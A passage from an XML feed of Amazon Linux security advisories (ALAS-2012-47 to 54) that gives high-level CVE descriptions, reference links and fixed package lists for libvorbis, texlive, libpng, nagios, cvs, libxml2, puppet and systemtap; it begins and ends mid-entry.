It was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request.
It was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially-crafted URI.
CVE-2011-3607:
Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions. An attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a ".htaccess" file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the "apache" user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607" title="" id="CVE-2011-3607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3639" title="" id="CVE-2011-3639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031" title="" id="CVE-2012-0031" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053" title="" id="CVE-2012-0053" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0128.html" title="" id="RHSA-2012:0128" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="httpd-debuginfo" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.22" release="1.23.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.22" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.22-1.23.amzn1.noarch.rpm</filename></package><package name="httpd-debuginfo" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.22" release="1.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.22-1.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-47</id><title>Amazon Linux - ALAS-2012-47: important priority package update for libvorbis</title><issued date="2012-03-04 16:07:00" /><updated date="2014-09-14 15:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0444:
Mozilla Firefox before 3.6.26 and 4.x through 9.0, Thunderbird before 3.1.18 and 5.0 through 9.0, and SeaMonkey before 2.7 do not properly initialize nsChildView data structures, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted Ogg Vorbis file.
A heap-based buffer overflow flaw was found in the way the libvorbis library parsed Ogg Vorbis media files. If a specially-crafted Ogg Vorbis media file was opened by an application using libvorbis, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
A flaw was found in the way Firefox parsed Ogg Vorbis media files. A web page containing a malicious Ogg Vorbis media file could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0444" title="" id="CVE-2012-0444" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0136.html" title="" id="RHSA-2012:0136" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libvorbis-debuginfo" version="1.2.3" release="4.6.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-debuginfo-1.2.3-4.6.amzn1.i686.rpm</filename></package><package name="libvorbis" version="1.2.3" release="4.6.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-1.2.3-4.6.amzn1.i686.rpm</filename></package><package name="libvorbis-devel" version="1.2.3" release="4.6.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-devel-1.2.3-4.6.amzn1.i686.rpm</filename></package><package name="libvorbis-debuginfo" version="1.2.3" release="4.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-debuginfo-1.2.3-4.6.amzn1.x86_64.rpm</filename></package><package name="libvorbis-devel-docs" version="1.2.3" release="4.6.amzn1" epoch="1" arch="noarch"><filename>Packages/libvorbis-devel-docs-1.2.3-4.6.amzn1.noarch.rpm</filename></package><package name="libvorbis" version="1.2.3" release="4.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-1.2.3-4.6.amzn1.x86_64.rpm</filename></package><package name="libvorbis-devel" version="1.2.3" release="4.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-devel-1.2.3-4.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-48</id><title>Amazon Linux - ALAS-2012-48: medium priority package update for texlive</title><issued date="2012-03-04 16:08:00" /><updated date="2014-09-14 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1554:
Off-by-one error in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory read, integer overflow, and invalid pointer dereference, a different vulnerability than CVE-2011-0764.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2011-1553:
Use-after-free vulnerability in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory write, a different vulnerability than CVE-2011-0764.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2011-1552:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, reads from invalid memory locations, which allows remote attackers to cause a denial of service (application crash) via a crafted Type 1 font in a PDF document, a different vulnerability than CVE-2011-0764.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash.
CVE-2011-0764:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, uses an invalid pointer in conjunction with a dereference operation, which allows remote attackers to execute arbitrary code via a crafted Type 1 font in a PDF document, as demonstrated by testz.2184122398.pdf.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2010-2642:
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by teTeX, it could cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by an application linked against t1lib, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by a TeX Live utility, it could cause the utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
Heap-based buffer overflow in the AFM font parser in the dvi-backend component in Evince 2.32 and earlier, teTeX 3.0, t1lib 5.1.2, and possibly other products allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font in conjunction with a DVI file that is processed by the thumbnailer.
A heap-based buffer overflow flaw was found in the DVI renderer's AFM font file parser. A DVI file that references a specially-crafted font file could, when opened, cause Evince to crash or, potentially, execute arbitrary code with the privileges of the user running Evince.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2642" title="" id="CVE-2010-2642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0764" title="" id="CVE-2011-0764" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1552" title="" id="CVE-2011-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1553" title="" id="CVE-2011-1553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1554" title="" id="CVE-2011-1554" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0137.html" title="" id="RHSA-2012:0137" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="texlive-dviutils" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-dviutils-2007-57.9.amzn1.i686.rpm</filename></package><package name="kpathsea" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/kpathsea-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-context" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-context-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-afm" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-afm-2007-57.9.amzn1.i686.rpm</filename></package><package name="mendexk" version="2.6e" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/mendexk-2.6e-57.9.amzn1.i686.rpm</filename></package><package name="texlive-xetex" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-xetex-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-east-asian" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-east-asian-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-debuginfo" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-debuginfo-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-utils" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-utils-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-dvips" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-dvips-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-latex" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-latex-2007-57.9.amzn1.i686.rpm</filename></package><package name="kpathsea-devel" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/kpathsea-devel-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-dvips" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-dvips-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="mendexk" version="2.6e" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mendexk-2.6e-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="kpathsea" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/kpathsea-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-debuginfo" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-debuginfo-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-context" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-context-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-afm" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-afm-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-latex" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-latex-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-utils" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-utils-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-xetex" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-xetex-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-east-asian" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-east-asian-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-dviutils" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-dviutils-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="kpathsea-devel" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/kpathsea-devel-2007-57.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-49</id><title>Amazon Linux - ALAS-2012-49: important priority package update for libpng</title><issued date="2012-03-04 16:09:00" /><updated date="2014-09-14 15:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3026:
Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation.
A heap-based buffer overflow flaw was found in the way XULRunner handled PNG (Portable Network Graphics) images. A web page containing a malicious PNG image could cause an application linked against XULRunner (such as Firefox) to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
A heap-based buffer overflow flaw was found in the way Thunderbird handled PNG (Portable Network Graphics) images. An HTML mail message or remote content containing a specially-crafted PNG image could cause Thunderbird to crash or, possibly, execute arbitrary code with the privileges of the user running Thunderbird.
A heap-based buffer overflow flaw was found in libpng. An attacker could create a specially-crafted PNG image that, when opened, could cause an application using libpng to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3026" title="" id="CVE-2011-3026" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0317.html" title="" id="RHSA-2012:0317" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libpng-static" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng-devel" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.46-2.10.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.46-2.10.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.46-2.10.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.46-2.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-50</id><title>Amazon Linux - ALAS-2012-50: medium priority package update for nagios</title><issued date="2012-03-04 16:10:00" /><updated date="2014-09-14 15:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2179:
Multiple cross-site scripting (XSS) vulnerabilities in config.c in config.cgi in (1) Nagios 3.2.3 and (2) Icinga before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the expand parameter, as demonstrated by an (a) command action or a (b) hosts action.
709871:
CVE-2011-2179 nagios: XSS in configuration command expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2179" title="" id="CVE-2011-2179" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nagios-debuginfo" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-debuginfo-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios-devel" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-devel-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.3.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-common-3.3.1-3.4.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-common-3.3.1-3.4.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-devel-3.3.1-3.4.amzn1.x86_64.rpm</filename></package><package name="nagios" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-3.3.1-3.4.amzn1.x86_64.rpm</filename></package><package name="nagios-debuginfo" version="3.3.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-debuginfo-3.3.1-3.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-51</id><title>Amazon Linux - ALAS-2012-51: medium priority package update for cvs</title><issued date="2012-03-04 16:12:00" /><updated date="2014-09-14 15:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0804:
A heap-based buffer overflow flaw was found in the way the CVS client handled responses from HTTP proxies. A malicious HTTP proxy could use this flaw to cause the CVS client to crash or, possibly, execute arbitrary code with the privileges of the user running the CVS client.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0804" title="" id="CVE-2012-0804" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0321.html" title="" id="RHSA-2012:0321" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cvs-debuginfo" version="1.11.23" release="11.6.amzn1" epoch="0" arch="i686"><filename>Packages/cvs-debuginfo-1.11.23-11.6.amzn1.i686.rpm</filename></package><package name="cvs" version="1.11.23" release="11.6.amzn1" epoch="0" arch="i686"><filename>Packages/cvs-1.11.23-11.6.amzn1.i686.rpm</filename></package><package name="cvs" version="1.11.23" release="11.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/cvs-1.11.23-11.6.amzn1.x86_64.rpm</filename></package><package name="cvs-debuginfo" version="1.11.23" release="11.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/cvs-debuginfo-1.11.23-11.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-52</id><title>Amazon Linux - ALAS-2012-52: medium priority package update for libxml2</title><issued date="2012-03-04 16:12:00" /><updated date="2014-09-14 15:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0841:
It was found that the hashing routine used by libxml2 arrays was susceptible to predictable hash collisions. Sending a specially-crafted message to an XML service could result in longer processing time, which could lead to a denial of service. To mitigate this issue, randomization has been added to the hashing function to reduce the chance of an attacker successfully causing intentional collisions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0841" title="" id="CVE-2012-0841" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0324.html" title="" id="RHSA-2012:0324" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-python" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.6-4.12.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.6-4.12.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.6-4.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-53</id><title>Amazon Linux - ALAS-2012-53: medium priority package update for puppet</title><issued date="2012-03-15 19:11:00" /><updated date="2014-09-14 15:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1054:
Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x before 2.0.3, when managing a user login file with the k5login resource type, allows local users to gain privileges via a symlink attack on .k5login.
791002:
CVE-2012-1054 Puppet 2.6.13 Klogin File Handling Issue
CVE-2012-1053:
The change_user method in the SUIDManager (lib/puppet/util/suidmanager.rb) in Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x before 2.0.3 does not properly manage group privileges, which allows local users to gain privileges via vectors related to (1) the change_user not dropping supplementary groups in certain conditions, (2) changes to the eguid without associated changes to the egid, or (3) the addition of the real gid to supplementary groups.
791001:
CVE-2012-1053 Puppet 2.6.13 group ID handling issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1053" title="" id="CVE-2012-1053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1054" title="" id="CVE-2012-1054" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet-server" version="2.6.14" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.6.14-1.5.amzn1.i686.rpm</filename></package><package name="puppet" version="2.6.14" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.6.14-1.5.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.14" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.6.14-1.5.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.6.14" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.6.14-1.5.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.6.14" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.6.14-1.5.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.6.14" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.6.14-1.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-54</id><title>Amazon Linux - ALAS-2012-54: medium priority package update for systemtap</title><issued date="2012-03-15 19:21:00" /><updated date="2014-09-14 15:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0875:
An invalid pointer read flaw was found in the way SystemTap handled malformed debugging information in DWARF format. When SystemTap unprivileged mode was enabled, an unprivileged user in the stapusr group could use this flaw to crash the system or, potentially, read arbitrary kernel memory. Additionally, a privileged user (root, or a member of the stapdev group) could trigger this flaw when tricked into instrumenting a specially-crafted ELF binary, even when unprivileged mode was not enabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0875" title="" id="CVE-2012-0875" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0376.html" title="" id="RHSA-2012:0376" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="systemtap-debuginfo" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-debuginfo-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-server" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-server-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-sdt-devel" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-sdt-devel-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-testsuite" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-testsuite-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-initscript" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-initscript-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-runtime" version="1.6" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/systemtap-runtime-1.6-5.12.amzn1.i686.rpm</filename></package><package name="systemtap-sdt-devel" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-sdt-devel-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-testsuite" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-testsuite-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-runtime" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-runtime-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap-debuginfo" version="1.6" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/systemtap-debuginfo-1.6-5.12.amzn1.x86_64.rpm</filename></package><package name="systemtap" version="1.6" release="5.12.amzn1" epoch="0" 